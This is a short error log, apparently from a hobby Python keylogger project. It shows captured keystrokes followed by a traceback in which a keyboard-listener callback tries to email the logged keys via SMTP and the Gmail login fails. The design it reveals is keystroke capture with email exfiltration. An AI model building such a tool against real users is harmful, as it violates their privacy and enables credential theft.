1313131313131333313333133313313133131332023-04-23 17:46:55,486: Unhandled exception in listener callback
Traceback (most recent call last):
  File "C:\Users\kalot\AppData\Local\Programs\Python\Python311\Lib\site-packages\pynput\_util\__init__.py", line 228, in inner
    return f(self, *args, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\kalot\AppData\Local\Programs\Python\Python311\Lib\site-packages\pynput\keyboard\_win32.py", line 287, in _process
    self.on_press(key)
  File "C:\Users\kalot\AppData\Local\Programs\Python\Python311\Lib\site-packages\pynput\_util\__init__.py", line 144, in inner
    if f(*args) is False:
       ^^^^^^^^
  File "C:\Users\kalot\Documents\GitHub\Programming-Challenges\Medium projects\klogger\logger.py", line 31, in on_press
    send_email('RECEIVANT EMAIL.com')
  File "C:\Users\kalot\Documents\GitHub\Programming-Challenges\Medium projects\klogger\logger.py", line 76, in send_email
    smtp.login(smtp_username, smtp_password)
  File "C:\Users\kalot\AppData\Local\Programs\Python\Python311\Lib\smtplib.py", line 750, in login
    raise last_exception
  File "C:\Users\kalot\AppData\Local\Programs\Python\Python311\Lib\smtplib.py", line 739, in login
    (code, resp) = self.auth(
                   ^^^^^^^^^^
  File "C:\Users\kalot\AppData\Local\Programs\Python\Python311\Lib\smtplib.py", line 662, in auth
    raise SMTPAuthenticationError(code, resp)
smtplib.SMTPAuthenticationError: (535, b'5.7.8 Username and Password not accepted. Learn more at\n5.7.8  https://support.google.com/mail/?p=BadCredentials e7-20020a056402148700b0050692cfc24asm3737792edv.16 - gsmtp')
